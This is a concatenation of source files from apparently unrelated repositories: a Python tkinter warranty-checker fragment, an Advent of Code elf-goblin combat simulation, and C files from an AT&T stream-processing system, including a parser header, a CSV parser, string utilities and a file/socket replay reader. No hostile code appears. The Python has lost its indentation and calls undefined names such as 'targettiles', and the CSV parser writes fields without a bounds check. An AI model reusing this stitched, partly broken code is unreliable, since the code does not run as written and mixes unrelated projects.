# create a formatted string of the Python JSON object
text = json.dumps(obj, sort_keys=True, indent=4)
return text
#########################################################
root=tk.Tk()
canvas = tk.Canvas(root, height=1500, width=1400)
frame1 = tk.Frame(root, bg='white')
frame1.place(relx=0.5, rely=0, relwidth=0.5, relheight=1)
frame2 = tk.Frame(root, bg='grey')
frame2.place(relx=0, rely=0, relwidth=0.5, relheight=1)
title_label = tk.Label(frame2, text='Server Warranty Checker', font=('Courier New', 12), bg='grey')
title_label.grid(row=1, column=1)
serial_label = tk.Label(frame2, text='Enter serial number:', font=('Courier New', 10), bg='grey')
serial_label.grid(row=3, column=1)
serial_no = tk.Entry(frame2, font=('Courier New', 8))
serial_no.grid(row = 4, column=1)
pn_label = tk.Label(frame2, text='Enter part number:', font=('Courier New', 10), bg='grey')
pn_label.grid(row=6, column=1)
product_no = tk.Entry(frame2, font=('Courier New', 8))
product_no.grid(row = 7, column=1)
output_label = tk.Label(frame1, font=('Courier New', 8), bg='white')
output_label.place(relx=0.05, rely=0.05, relheight=0.9, relwidth=0.9)
submit_btn = tk.Button(frame2, text='Submit', font=('Courier New', 8), bg='blue', command= getWarranty)
submit_btn.grid(row = 8, column=1)
#########################################################
root.mainloop()
<file_sep>/AoCFile.py
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
############################################################################
class Unit:
########################################################################
def __init__(self, ID, yx, mapicon):
self.id = ID
self.hp = 200
self.atk = 3
self.yx = yx
self.race = {'E':'Elf', 'G':'Goblin'}[mapicon]
self.mapicon = mapicon
self.enemyicon = {'E':'G', 'G':'E'}[mapicon]
self.target = None
def attack(self, Units):
# figure out how many enemies are adjacent
adjtiles = {tuple(map(sum, zip(self.yx, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}}
adjenemies = [x for x in Units if Units[x].yx in adjtiles]
# if enemies adj, pick lowest hp and attack
if not adjenemies:
print('Cannot attack - no enemies adjacent')
elif adjenemies:
lowestHPval = min([Units[x].hp for x in adjenemies])
targetcoords = [Units[enemy].yx for enemy in adjenemies if Units[enemy].hp == lowestHPval]
target = ''.join(x for x in Units if Units[x].yx == targetcoords)
Units[target].hp -= self.atk
if Units[target].hp <= 0:
del Units[target]
def move(self, Units):
nextcoord = findmove(self, Units)
self.yx = nextcoord
self.target = None
########################################################################
def findmove(self, Units): # evaluate attacktiles movelist to find correct move
attacktiles = set()
EnemyList = {Unit for Unit in Units if Unit.race != self.race}
for Enemy in EnemyList:
attacktiles = attacktiles.union([x for x in {tuple(map(sum, zip(Enemy.yx, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}} if MapData[x[0]][x[1]] != '.'])
# find attack tiles that are currently reachable
availtiles = findavailtiles(self, set(), self.yx, 0, attacktiles, dict()) #{(y, x): distance}
# determine closest attack tile(s)
closest = [i for i, j in targettiles.items() if j == min(targettiles.values())]
# use reading order to decide on target tile
self.target = sorted(sorted(closest, key=lambda x: x[1]), key=lambda x: x[0])[0]
# figure out which way to move
adjtiles = [x for x in {tuple(map(sum, zip(self.yx, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}} if MapData[x[0]][x[1]] != '.']
moveops = dict()
for adjtile in adjtiles:
moveops.update({adjtile: evalmoves(self, set(), adjtile, 0, 9999)})
moveops = [i for i, j in moveops.items() if j == min(moveops.values())]
nextcoord = sorted(sorted(moveops, key=lambda x: x[1]), key=lambda x: x[0])[0]
return nextcoord
########################################################################
def findavailtiles(self, seen, curcoord, dist, attacktiles, availtiles):
seen.add(curcoord)
if curcoord in attacktiles:
if curcoord not in availtiles:
availtiles.update({curcoord: dist})
elif curcoord in availtiles and availtiles[curcoord] > dist:
availtiles[curcoord] = dist
dist += 1
nextcoords = [x for x in {tuple(map(sum, zip(curcoord, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}} if MapData[x[0]][x[1]] != '.' and (x[0],x[1]) not in seen]
##### recursive function for further tiles
for nextcoord in nextcoords:
availtiles = findavailtiles(self, seen, nextcoord, dist, attacktiles, availtiles)
return availtiles
########################################################################
def evalmoves(self, seen, curcoord, dist, movesneeded):
seen.add(curcoord)
if curcoord == self.target:
if movesneeded > dist:
movesneeded = dist
dist += 1
nextcoords = [x for x in {tuple(map(sum, zip(curcoord, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}} if MapData[x[0]][x[1]] != '.' and (x[0],x[1]) not in seen]
##### recursive function for further tiles
for nextcoord in nextcoords:
movesneeded = evalmoves(self, seen, nextcoord, dist, movesneeded)
return movesneeded
| 09317d05fdb9488dc99e7b1fc8d06cb53b4cb2a3 | [
"Python"
] | 2 | Python | yayyuh/Github | 13cc0adaf60f7ce260c7543695ae7b2aa6935086 | c2c781d15f6d45d49917a5e321bb9a0257939f27 |
refs/heads/master | <file_sep>This directory is used for generated .h files
All .h files in this directory will be included in
the generated *_lfta.c files (e.g. localhost_lfta.c)
<file_sep>/* A Bison parser, made by GNU Bison 3.0.4. */
/* Bison interface for Yacc-like parsers in C
Copyright (C) 1984, 1989-1990, 2000-2015 Free Software Foundation, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>. */
/* As a special exception, you may create a larger work that contains
part or all of the Bison parser skeleton and distribute that work
under terms of your choice, so long as that work isn't itself a
parser generator using the skeleton or a modified version thereof
as a parser skeleton. Alternatively, if you modify or redistribute
the parser skeleton itself, you may (at your option) remove this
special exception, which will cause the skeleton and the resulting
Bison output files to be licensed under the GNU General Public
License without this special exception.
This special exception was added by the Free Software Foundation in
version 2.2 of Bison. */
#ifndef YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED
# define YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED
/* Debug traces. */
#ifndef YYDEBUG
# define YYDEBUG 0
#endif
#if YYDEBUG
extern int FtaParserdebug;
#endif
/* Token type. */
#ifndef YYTOKENTYPE
# define YYTOKENTYPE
enum yytokentype
{
NAME = 258,
STRING_TOKEN = 259,
INTNUM = 260,
LONGINTNUM = 261,
APPROXNUM = 262,
OR = 263,
AND = 264,
NOT = 265,
COMPARISON = 266,
SHIFT_OP = 267,
UMINUS = 268,
SEMICOLON = 269,
LEFTBRACE = 270,
RIGHTBRACE = 271,
BY = 272,
AS = 273,
AGGR = 274,
FROM = 275,
INNER_JOIN = 276,
FILTER_JOIN = 277,
OUTER_JOIN = 278,
LEFT_OUTER_JOIN = 279,
RIGHT_OUTER_JOIN = 280,
WATCHLIST_JOIN = 281,
GROUP = 282,
HAVING = 283,
IN = 284,
SELECT = 285,
WATCHLIST = 286,
WHERE = 287,
SUPERGROUP = 288,
CLEANING_WHEN = 289,
CLEANING_BY = 290,
CLOSING_WHEN = 291,
SUCH = 292,
THAT = 293,
CUBE = 294,
ROLLUP = 295,
GROUPING_SETS = 296,
TRUE_V = 297,
FALSE_V = 298,
TIMEVAL_L = 299,
HEX_L = 300,
LHEX_L = 301,
IP_L = 302,
IPV6_L = 303,
MERGE = 304,
SLACK = 305,
DEFINE_SEC = 306,
PARAM_SEC = 307,
PROTOCOL = 308,
TABLE = 309,
STREAM = 310,
FTA = 311,
UNPACK_FCNS = 312,
OPERATOR = 313,
OPERATOR_VIEW = 314,
FIELDS = 315,
SUBQUERIES = 316,
SELECTION_PUSHDOWN = 317
};
#endif
/* Value type. */
#if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
union YYSTYPE
{
#line 52 "fta.y" /* yacc.c:1909 */
int intval;
double floatval;
char *strval;
int subtok;
string_t *stringval;
/* for FTA definition. */
literal_t *litval;
scalarexp_t *scalarval;
se_list_t *se_listval;
select_list_t *select_listval;
table_exp_t *tblp;
predicate_t *predp;
literal_list_t *lit_l;
tablevar_t *table;
tablevar_list_t *tbl_list;
colref_t *colref;
ifpref_t *ifpref;
colref_list_t *clist;
var_defs_t *var_defs;
var_pair_t *var_pair;
gb_t *gb_val;
gb_list_t *gb_list;
list_of_gb_list_t *list_of_gb_list;
extended_gb_t *extended_gb;
extended_gb_list_t *extended_gb_list;
query_list_t *q_list;
/* For table definition */
field_entry *field_t;
field_entry_list *field_list_t;
table_def *table_def_t;
table_list *table_list_schema;
param_list *plist_t;
name_vec *namevec_t;
subquery_spec *subq_spec_t;
subqueryspec_list *subqueryspec_list_t;
unpack_fcn *ufcn;
unpack_fcn_list *ufcnl;
#line 162 "fta.tab.cc.h" /* yacc.c:1909 */
};
typedef union YYSTYPE YYSTYPE;
# define YYSTYPE_IS_TRIVIAL 1
# define YYSTYPE_IS_DECLARED 1
#endif
extern YYSTYPE FtaParserlval;
int FtaParserparse (void);
#endif /* !YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED */
<file_sep>#ifndef __CSV_PARSER__
#define __CSV_PARSER__
/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include "packet.h"
// maximum number of fields to be parsed in CSV record
static gs_uint32_t max_field = CSVELEMENTS;
static gs_uint8_t delim;
static inline void csv_set_delim(gs_uint8_t del) {
delim = del;
}
static inline void csv_set_maxfield(gs_uint32_t max) {
max_field = max;
}
static inline void csv_parse_line(gs_sp_t line, ssize_t len) {
cur_packet.systemTime=time(0);
gs_uint32_t i=0;
gs_uint32_t p=0;
gs_uint32_t last_field_start=0;
while(i<len){
last_field_start=i;
cur_packet.record.csv.fields[p]=&line[i];
while((i<len)&&(line[i] != delim)) {
i++;
}
cur_packet.record.csv.field_lens[p]=i-last_field_start;
i++;
p++;
}
cur_packet.record.csv.numberfields=p;
}
#endif
<file_sep>#ifndef RTS_STRING_H
#define RTS_STRING_H
#ifdef __cplusplus
extern "C" {
#endif
/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <stdint.h>
#include<math.h>
#include "gsconfig.h"
#include "gstypes.h"
#define IS_BIG_ENDIAN (*(uint16_t *)"\0\xff" < 0x100)
// struct string32 matches vstring32, its the packed record format.
// struct gs_string is the in-memory format.
struct string32{
gs_int32_t length;
gs_int32_t offset;
gs_int32_t reserved;
};
/* struct gs_string has to match definition in host.h however, the data
types differ */
struct gs_string {
gs_int32_t length;
gs_sp_t data;
struct FTA * owner;
};
#include "fta.h"
#include "rts.h"
/* Basic string operation */
gs_retval_t str_assign_with_copy(struct FTA *, struct gs_string * dest, struct gs_string * src);
gs_retval_t str_assign_with_copy_in_tuple(struct string32 * dest, struct gs_string * src,
gs_sp_t start, gs_sp_t buf);
#define str_destroy(s) {if ((s)->owner!=0) fta_free((s)->owner,(s)->data);}
gs_retval_t str_replace(struct FTA *, struct gs_string * dest, struct gs_string * src );
#define str_length(s) (s)->length
/* Searching within a string */
gs_retval_t str_exists_substr( struct gs_string * str1, struct gs_string * str2);
/* String comparison */
gs_retval_t str_compare( struct gs_string * str1, struct gs_string * str2);
/* String equality */
gs_retval_t str_equal( struct gs_string * str1, struct gs_string * str2);
/* Construct a string constant */
gs_retval_t str_constructor(struct gs_string *s, gs_csp_t l);
/* string hash */
#define string_hash(s) lfta_V_STR_to_hash((*(s)))
/* External Function definitions */
#define ULLMIN(x,y) (unsigned long long)(((x)<(y)?(x):(y)))
#define ULLMAX(x,y) (unsigned long long)(((x)<(y)?(y):(x)))
#define LLMIN(x,y) (long long int)(((x)<(y)?(x):(y)))
#define LLMAX(x,y) (long long int)(((x)<(y)?(y):(x)))
#define UMIN(x,y) (unsigned int)(((x)<(y)?(x):(y)))
#define UMAX(x,y) (unsigned int)(((x)<(y)?(y):(x)))
#define LMIN(x,y) (int)(((x)<(y)?(x):(y)))
#define LMAX(x,y) (int)(((x)<(y)?(y):(x)))
#define FMIN(x,y) (double)(((x)<(y)?(x):(y)))
#define FMAX(x,y) (double)(((x)<(y)?(y):(x)))
// type conversion
#define INT(c) ((int)(c))
#define UINT(c) ((unsigned int)(c))
#define ULLONG(c) ((unsigned long long)(c))
#define LLONG(c) ((long long int)(c))
#define FLOAT(c) ((double)(c))
// comparison
#define EQ(x,y) ((x)==(y))
#define GEQ(x,y) ((x)>=(y))
#define GE(x,y) ((x)>(y))
#define LEQ(x,y) ((x)<=(y))
#define LE(x,y) ((x)<(y))
// if_else
#define if_else_f(x,y,z) (double)(((x)==0?(z):(y)))
#define if_else_ll(x,y,z) (long long int)(((x)==0?(z):(y)))
#define if_else_ul(x,y,z) (unsigned long long)(((x)==0?(z):(y)))
#define if_else_u(x,y,z) (unsigned int)(((x)==0?(z):(y)))
#define if_else_i(x,y,z) (int)(((x)==0?(z):(y)))
// Cast away temporality
#define non_temporal(x)(x)
// endian swap
#define endian_swap_ui(x) ( (( (x) & 0xFF000000) >> 24) | (( (x) & 0x00FF0000) >> 8) | (( (x) & 0x0000FF00) << 8) | (( (x) & 0x000000FF) << 24) )
// Access math libraries
#define sqrt(x) sqrt(x)
#define pow(x,y) pow((x),(y))
#define sin(x) sin(x)
#define cos(x) cos(x)
#define tan(x) tan(x)
#define asin(x) asin(x)
#define acos(x) acos(x)
#define atan(x) atan(x)
#define log(x) log(x)
#define log2(x) log2(x)
#define log10(x) log10(x)
#define ceil(x) ceil(x)
#define floor(x) floor(x)
#define fmod(x) fmod(x)
#define trunc(x) trunc(x)
gs_uint32_t str_match_offset( gs_uint32_t offset, struct gs_string * s1, struct gs_string * s2);
gs_uint32_t byte_match_offset( gs_uint32_t offset, gs_uint32_t val, struct gs_string * s2);
gs_param_handle_t register_handle_for_str_regex_match_slot_1(struct FTA * f,
struct gs_string* pattern);
gs_uint32_t str_regex_match(struct gs_string* str, gs_param_handle_t pattern_handle);
gs_retval_t deregister_handle_for_str_regex_match_slot_1(gs_param_handle_t handle);
gs_param_handle_t register_handle_for_str_partial_regex_match_slot_1(struct FTA * f,
struct gs_string* pattern);
gs_uint32_t str_partial_regex_match(struct gs_string* str,
gs_param_handle_t pattern_handle,
gs_uint32_t maxlen);
gs_retval_t deregister_handle_for_str_partial_regex_match_slot_1(
gs_param_handle_t
handle);
// ----------------------------------
// Substring functions
/* Make `result` a shallow prefix view of `str`, at most `length` bytes
   long. No bytes are copied and no ownership is transferred (result->owner
   is left untouched, exactly as before). Always returns 0. */
inline static gs_retval_t str_truncate(struct gs_string * result, struct gs_string *str, gs_uint32_t length) {
	result->data = str->data;
	/* unsigned comparison, matching the original's implicit conversion */
	if ((gs_uint32_t)str->length < length)
		result->length = str->length;
	else
		result->length = length;
	return 0;
}
gs_retval_t str_suffix(struct gs_string * ret, struct gs_string *s, gs_uint32_t n);
gs_retval_t get_list_entry(struct gs_string * ret, struct gs_string *l, struct gs_string *sep, gs_uint32_t pos);
// ----------------------------------
// constant string conversions
gs_param_handle_t register_handle_for_strtoi_c_slot_0(struct FTA * f, struct gs_string* istr) ;
gs_retval_t deregister_handle_for_strtoi_c_slot_0(gs_param_handle_t h) ;
#define strtoi_c(h) ((unsigned int)(h))
gs_param_handle_t register_handle_for_strtoip_c_slot_0(struct FTA * f, struct gs_string* istr) ;
gs_retval_t deregister_handle_for_strtoip_c_slot_0(gs_param_handle_t h) ;
#define strtoip_c(h) ((unsigned int)(h))
////////////////////////////////////////////////
/// IPV6
#ifndef IPV6_STR
#define IPV6_STR
struct ipv6_str{
gs_uint32_t v[4];
};
#endif
gs_int32_t ipv6_compare( struct ipv6_str i1, struct ipv6_str i2);
gs_int32_t Ipv6_Constructor(struct ipv6_str *s, char *l);
struct ipv6_str And_Ipv6(const struct ipv6_str i1, const struct ipv6_str i2);
struct ipv6_str Or_Ipv6(const struct ipv6_str i1, const struct ipv6_str i2);
struct ipv6_str hton_ipv6(struct ipv6_str s);
struct ipv6_str ntoh_ipv6(struct ipv6_str s);
////////////////////////////////////////////////
/// Regex pattern extraction based on signature library for VideoNOC
gs_param_handle_t register_handle_for_signaturelib_get_content_id_slot_2(struct FTA * f, struct gs_string* signature_file);
gs_uint32_t signaturelib_get_content_id(struct gs_string* result, struct gs_string* url, gs_uint32_t content_length, gs_param_handle_t handle);
gs_retval_t deregister_handle_for_signaturelib_get_content_id_slot_2(gs_param_handle_t handle);
gs_uint32_t signaturelib_get_fqdn(struct gs_string* result);
gs_uint32_t signaturelib_get_channel_type(struct gs_string* result);
#ifdef __cplusplus
}
#endif
#endif
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <zlib.h>
#include <errno.h>
#include <stdio.h>
#include <dirent.h>
extern "C" {
#include "gsconfig.h"
#include "gshub.h"
#include "gstypes.h"
#include "lapp.h"
#include "fta.h"
#include "packet.h"
#include "schemaparser.h"
#include "lfta/rts.h"
void fta_init(gs_sp_t device);
void rts_fta_process_packet(struct packet * p);
void rts_fta_done();
}
time_t st_time;
#define CSVMAXLINE 1000000
#define CHUNK 262144
static gs_uint8_t in[CHUNK + CSVMAXLINE];
static gs_uint8_t out[CHUNK + CSVMAXLINE];
#define FILEWAIT_TIMEOUT 10000 // timeout value for getting next file (in microseconds)
gs_uint32_t max_field_csv = CSVELEMENTS;
z_stream strm;
#ifdef BSA_ENABLED
#include "bsa_stream.hpp"
#include "bsa_util.hpp"
BSA::FileStream::ISubStream* stream;
BSA::FileStream::IFileHandle* ifh;
BSA::FileStream::Reader* reader;
#endif
#ifdef SSL_ENABLED
#include <openssl/pem.h>
#include <openssl/x509.h>
#include <openssl/x509v3.h>
#include <openssl/ssl.h>
#include <openssl/crypto.h>
#include <openssl/err.h>
EVP_PKEY *rkey;
PKCS7 *p7;
BIO* mem_io;
char pwd[CSVMAXLINE];
// callback for passing password to private key reader
// OpenSSL pem_password_cb: supply the password (read earlier into the
// global `pwd`) to the private-key reader. Returns the number of bytes
// placed in `buf`. rwflag/u are unused.
int pass_cb(char *buf, int size, int rwflag, void *u) {
	int len = strlen(pwd);
	// BUG FIX: clamp to OpenSSL's buffer size — the unclamped memcpy
	// overran `buf` whenever the password file line exceeded `size` bytes.
	if (len > size)
		len = size;
	memcpy(buf, pwd, len);
	return len;
}
#endif
gs_sp_t dev;
static int listensockfd=-1;
static int fd=-1;
static struct packet cur_packet;
static gs_sp_t name;
static gs_sp_t dir_name;
struct dirent **namelist;
static gs_int32_t num_dir_files;
static gs_sp_t line;
static ssize_t len;
static size_t line_len;
static gs_uint32_t lineend=0;
static gs_uint8_t csvdel = ',';
static gs_uint32_t verbose=0;
static gs_uint32_t startupdelay=0;
static gs_uint32_t singlefile=0;
static gs_uint32_t use_gzip=0;
static gs_uint32_t use_bsa=0;
static gs_uint32_t use_decryption=0;
static gs_uint32_t gshub=0;
static int socket_desc=0;
#include "lfta/csv_parser.h"
// leftover bytes not consumed at the end of the data chunk
gs_uint32_t leftover = 0;
/* Monotonic clock reading in milliseconds, or 0 if the clock cannot be
   read. Used only for computing tuple-processing rates. */
uint64_t get_posix_clock_time ()
{
	struct timespec now;
	if (clock_gettime (CLOCK_MONOTONIC, &now) != 0)
		return 0;
	return (uint64_t) (now.tv_sec * 1000 + now.tv_nsec / 1000000);
}
// (Re)initialize the global zlib stream `strm` for decompression.
// Called once per input file when the interface property compressor=GZIP.
// Exits the process on failure.
// NOTE(review): assumes any previous stream reached Z_STREAM_END and was
// released via inflateEnd() — verify behavior for truncated gzip inputs.
static void init_inflate() {
	gs_int32_t ret;
	/* allocate inflate state */
	strm.zalloc = Z_NULL;
	strm.zfree = Z_NULL;
	strm.opaque = Z_NULL;
	strm.avail_in = 0;
	strm.next_in = Z_NULL;
	// windowBits 15 plus 32 enables automatic zlib/gzip header detection
	ret = inflateInit2(&strm, 15 /* window bits */ | 32 /* use gzip */);
	if (ret != Z_OK) {
		print_error((gs_sp_t)"csv::inflateInit2");
		exit(10);
	}
}
// Drain the GSCP control-message queue while the reader is blocked waiting
// for input (e.g. for the next replay file to appear). Exits on failure so
// a broken message queue does not hang the process silently.
static void csv_replay_check_messages() {
	if (fta_start_service(0)<0) {
		print_error((gs_sp_t)"Error:in processing the msg queue for a replay file");
		exit(9);
	}
}
// Read up to `length` bytes of CSV data from the gshub stream socket into
// buffer+leftover (the first `leftover` bytes of `buffer` hold an
// unconsumed partial line from the previous chunk).
// Returns the number of bytes read, -1 on the 1ms select() timeout
// (caller then services the message queue), or -2 on error.
static gs_int32_t read_chunk_socket(gs_sp_t buffer, gs_uint32_t length){
	// BUG FIX: `r` was gs_uint32_t, so read()'s -1 error return wrapped to
	// a huge positive value and the `r <= 0` error check never fired.
	ssize_t r;
	fd_set socket_rset;
	fd_set socket_eset;
	struct timeval socket_timeout;
	gs_int32_t retval;
	FD_ZERO(&socket_rset);
	FD_SET(socket_desc,&socket_rset);
	FD_ZERO(&socket_eset);
	FD_SET(socket_desc,&socket_eset);
	// timeout in one millisecond
	socket_timeout.tv_sec = 0;
	socket_timeout.tv_usec = 1000;
	if ((retval = select(socket_desc+1,&socket_rset,0,&socket_eset,&socket_timeout))<=0) {
		if (retval==0) {
			// caught a timeout
			return -1;
		}
		return -2;
	}
	if ((r=read(socket_desc, buffer + leftover, length)) <= 0) {
		print_error((gs_sp_t)"ERROR:could not read data from csv stream");
		return -2;
	}
	return (gs_int32_t)r;
}
// Look up this stream's data source via gshub and open a TCP connection
// to it, leaving the connected socket in the global `socket_desc`.
// Exits on any failure. Note: the local `gshub` endpoint shadows the
// global `gshub` flag; parserversion/schemalen/asciischema/buf are unused
// here (presumably leftovers from schema negotiation — candidates for
// cleanup).
static void init_socket() {
	endpoint gshub;
	endpoint srcinfo;
	struct sockaddr_in server;
	gs_int32_t parserversion;
	gs_uint32_t schemalen;
	static gs_sp_t asciischema=0;
	gs_int8_t buf[1024];
	if (get_hub(&gshub)!=0) {
		print_error((gs_sp_t)"ERROR:could not find gshub for data source");
		exit(0);
	}
	// registers interest and waits (blocking flag = 1) for the source
	if (get_streamsource(gshub,name,&srcinfo,1) !=0) {
		print_error((gs_sp_t)"ERROR:could not find data source for stream\n");
		exit(0);
	}
	socket_desc = socket(AF_INET , SOCK_STREAM , 0);
	if (socket_desc == -1)
	{
		print_error((gs_sp_t)"ERROR:could not create socket for data stream");
		exit(0);
	}
	// srcinfo.ip/port are already in network byte order as supplied by gshub
	server.sin_addr.s_addr = srcinfo.ip;
	server.sin_family = AF_INET;
	server.sin_port = srcinfo.port;
	if (connect(socket_desc , (struct sockaddr *)&server , sizeof(server)) < 0) {
		print_error((gs_sp_t)"ERROR: could not open connection to data source");
		exit(0);
	}
}
// Advance to the next input file, leaving an open descriptor in the global
// `fd` (and, for encrypted input, a decoding BIO in `mem_io`).
// Three modes:
//  - directory mode (dir_name set): iterate a one-time alphasort scandir()
//    of the directory; when exhausted, signal completion and spin on the
//    message queue forever;
//  - single-file mode: open `name` once;
//  - default replay mode: wait for `name` to appear, open it, unlink it.
static void next_file() {
	static gs_uint32_t file_pos = 0;	// next scandir() entry to use
	static gs_uint32_t scan_finished = 0;	// directory fully consumed
	char buf[CSVMAXLINE];
	if (dir_name) {
		if (scan_finished) {
			if (verbose)
				fprintf(stderr,"Done processing, waiting for things to shut down\n");
			rts_fta_done();
			// now just service message queue until we get killed or lose connectivity
			while (true) {
				fta_start_service(0); // service all waiting messages
				usleep(1000); // sleep a millisecond
			}
		}
		if (num_dir_files) { // we already started directory scan
			free(name);
			if (file_pos < num_dir_files) {
				sprintf(buf, "%s/%s", dir_name, namelist[file_pos]->d_name);
				name = strdup(buf);
				free(namelist[file_pos]);
				file_pos++;
			} else {
				free(namelist);
				scan_finished = 1;
				return;
			}
		} else {
			// first call: scan the whole directory once, sorted
			num_dir_files = scandir(dir_name, &namelist, NULL, alphasort);
			if (num_dir_files == -1) {
				num_dir_files = 0;
				print_error((gs_sp_t)"ERROR: Unable to scan directory");
				return;
			}
			if (num_dir_files == 2) { // only . and .. are there, empty dir
				free(namelist[0]);
				free(namelist[1]);
				scan_finished = 1;
				return;
			} else
				file_pos = 2;
			// NOTE(review): starting at index 2 assumes alphasort placed
			// "." and ".." first; entries sorting before "." (e.g. names
			// starting with '!') would break this. Also namelist[0]/[1]
			// are never freed on this path — minor leak. Verify.
			sprintf(buf, "%s/%s", dir_name, namelist[file_pos]->d_name);
			name = strdup(buf);
			free(namelist[file_pos]);
			file_pos++;
		}
	}
	struct stat s;
	if (verbose) {
		fprintf(stderr,"Opening %s\n",name);
	}
	if (singlefile == 0) {
		// wait for the file to materialize, servicing messages meanwhile
		while (lstat(name, &s) != 0) {
			if (errno != ENOENT) {
				print_error((gs_sp_t)"csv::lstat unexpected return value");
				exit(10);
			}
			csv_replay_check_messages();
			usleep(FILEWAIT_TIMEOUT);
		}
		// close the previous file before opening the next
		if (fd > 0) {
			close(fd);
		}
	}
	if ((fd = open(name, O_RDONLY)) < 0) {
		print_error((gs_sp_t)"csv::open failed ");
		exit(10);
	}
	posix_fadvise(fd, 0, 0, POSIX_FADV_SEQUENTIAL);
#ifdef SSL_ENABLED
	if (use_decryption) {
		// free SSL resources from the previous file
		if (mem_io)
			BIO_free(mem_io);
		if (p7)
			PKCS7_free(p7);
		// wrap fd in a FILE* to parse the DER-encoded PKCS7 envelope
		FILE *fp = fdopen(fd, "r");
		p7 = d2i_PKCS7_fp(fp, NULL);
		if (p7 == NULL) {
			print_error((gs_sp_t)"Error reading SMIME message from file");
			exit(-1);
		}
		// mem_io yields the decrypted payload via BIO_read
		if(!(mem_io = PKCS7_dataDecode(p7, rkey, NULL, NULL))) {
			print_error((gs_sp_t)"Error decoding PKCS7 file\n");
			exit(-1);
		}
		fclose(fp);
	}
#endif
	// replay mode consumes files: remove so the producer can drop the next one
	if (!dir_name && !singlefile) {
		unlink(name);
	}
	if (use_gzip) {
		init_inflate();
	}
}
#ifdef BSA_ENABLED
uint64_t bsa_file_start_time = 0;
uint64_t bsa_total_elapsed_time = 0;
// BSA mode: fetch the next file handle from the BSA substream and open a
// reader on it, accumulating per-file elapsed time for rate reporting.
// Leaves ifh == NULL if no file became available within the timeout.
static void next_file_bsa() {
	int ret;
	// fold the time spent on the previous file into the running total
	if (bsa_file_start_time) {
		bsa_total_elapsed_time += (get_posix_clock_time()- bsa_file_start_time);
		bsa_file_start_time = 0;
	}
	// timeout is in milliseconds for the BSA API
	ifh = stream->getNextFileHandle(FILEWAIT_TIMEOUT / 1000);
	if (!ifh) {
		return;
	}
	if (verbose) {
		fprintf(stderr,"%s: Opening %s %s\n", dev, ifh->getHandle().c_str(), stream->getPositionHandle().c_str());
	}
	bsa_file_start_time = get_posix_clock_time();
	reader = ifh->openFile();
	if (use_gzip) {
		init_inflate();
	}
}
// Release the current BSA reader and file handle (marking the file as
// finished so BSA will not redeliver it), resetting both globals to NULL.
// Safe to call when nothing is open.
static void close_file_bsa() {
	if (reader) {
		reader->close();
		delete reader;
	}
	reader = NULL;
	if (ifh) {
		ifh->finished();
		delete ifh;
	}
	ifh = NULL;
}
#endif
// Parse this interface's configuration properties and set the module-level
// globals that drive the reader: input source (filename/directoryname or
// gshub), CSV delimiter, single-file vs. replay mode, gzip compression,
// BSA streaming, startup delay, max CSV field, and (when built with SSL)
// PKCS7 decryption material. Exits on invalid/contradictory configuration.
// Always returns 0.
// Code change vs. original: fixed the typo "itnerface" in the
// privatekey/password error message; everything else is unchanged.
static gs_retval_t csv_replay_init(gs_sp_t device)
{
	gs_csp_t verbosetmp;
	gs_csp_t delaytmp;
	gs_csp_t gshubtmp;
	gs_csp_t tempdel;
	gs_csp_t singlefiletmp;
	gs_csp_t compressortmp;
	gs_csp_t bsatmp;
	gs_csp_t encryptedtmp;
	gs_csp_t maxfieldtmp;
	gs_csp_t pkey_fname;
	gs_csp_t pwd_fname;
	gs_csp_t stringtmp;
	if ((verbosetmp=get_iface_properties(device,(gs_sp_t)"verbose"))!=0) {
		if (strncmp(verbosetmp,"TRUE",4)==0) {
			verbose=1;
			fprintf(stderr,"VERBOSE ENABLED\n");
		} else {
			fprintf(stderr,"VERBOSE DISABLED\n");
		}
	}
	// input is either a single (replayed) file or a directory of files
	stringtmp=get_iface_properties(device,(gs_sp_t)"filename");
	if(stringtmp){
		name = strdup(stringtmp);
	}else{
		name = NULL;
	}
	stringtmp=get_iface_properties(device,(gs_sp_t)"directoryname");
	if(stringtmp){
		dir_name = strdup(stringtmp);
	}else{
		dir_name = NULL;
	}
	if (!name && !dir_name) {
